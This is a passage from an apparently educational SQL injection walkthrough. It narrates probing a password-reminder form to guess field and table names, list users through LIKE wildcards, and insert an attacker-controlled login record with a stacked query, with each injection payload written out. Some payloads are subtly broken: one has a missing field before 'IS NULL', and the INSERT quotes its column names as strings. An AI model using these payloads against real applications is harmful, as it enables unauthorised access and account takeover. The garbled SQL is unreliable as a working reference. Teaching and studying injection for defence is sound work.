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SQL Injection


"SQL Injection" is subset of the an unverified/unsanitized user input vulnerability ("buffer overflows" are a different subset), and the idea is to convince the application to run SQL code that was not intended. If the application is creating SQL strings naively on the fly and then running them, it's straightforward to create some real surprises.

We'll note that this was a somewhat winding road with more than one wrong turn, and others with more experience will certainly have different -- and better -- approaches. But the fact that we were successful does suggest that we were not entirely misguided.

There have been other papers on SQL injection, including some that are much more detailed, but this one shows the rationale of discovery as much as the process of exploitation.



Schema field mapping


So we'll do it in steps. In each case, we'll show the whole query as we know it, with our own snippets shown specially. We know that the tail end of the query is a comparison with the email address, so let's guess email as the name of the field:


$ SELECT fieldlist FROM table WHERE field = 'x' AND email IS NULL; --';


Next we'll guess some other obvious names: password, user ID, name, and the like. These are all done one at a time, and anything other than "server failure" means we guessed the name correctly.


$ SELECT fieldlist FROM table WHERE email = 'x' AND userid IS NULL; --';



Finding the table name

The application's built-in query already has the table name built into it, but we don't know what that name is: there are several approaches for finding that (and other) table names. The one we took was to rely on a subselect.


A standalone query of


$ SELECT COUNT(*) FROM tabname


Returns the number of records in that table, and of course fails if the table name is unknown. We can build this into our string to probe for the table name:


$ SELECT email, passwd, login_id, full_name FROM table WHERE email = 'x' AND 1=(SELECT COUNT(*) FROM tabname); --';


We don't care how many records are there, of course, only whether the table name is valid or not. By iterating over several guesses, we eventually determined that members was a valid table in the database. But is it the table used in this query? For that we need yet another test using table.field notation: it only works for tables that are actually part of this query, not merely that the table exists.


$ SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x' AND IS NULL; --';


When this returned "Email unknown", it confirmed that our SQL was well formed and that we had properly guessed the table name. This will be important later, but we instead took a different approach in the interim.


Finding some users


The idea is to submit a query that uses the LIKE clause, allowing us to do partial matches of names or email addresses in the database, each time triggering the "We sent your password" message and email. Warning: though this reveals an email address each time we run it, it also actually sends that email, which may raise suspicions. This suggests that we take it easy.

We can do the query on email name or full name (or presumably other information), each time putting in the % wildcards that LIKE supports:


$ SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x' OR full_name LIKE '%Bob%';


Keep in mind that even though there may be more than one "Bob", we only get to see one of them: this suggests refining our LIKE clause narrowly.

Ultimately, we may only need one valid email address to leverage our way in


Adding some member


Given that we know the partial structure of the members table, it seems like a plausible approach to attempt adding a new record to that table: if this works, we'll simply be able to login directly with our newly-inserted credentials.

This, not surprisingly, takes a bit more SQL, and we've wrapped it over several lines for ease of presentation, but our part is still one contiguous string:


$ SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x'; INSERT INTO members ('email','passwd','login_id','full_name') VALUES ('','hello','steve','Steve Friedl');--';

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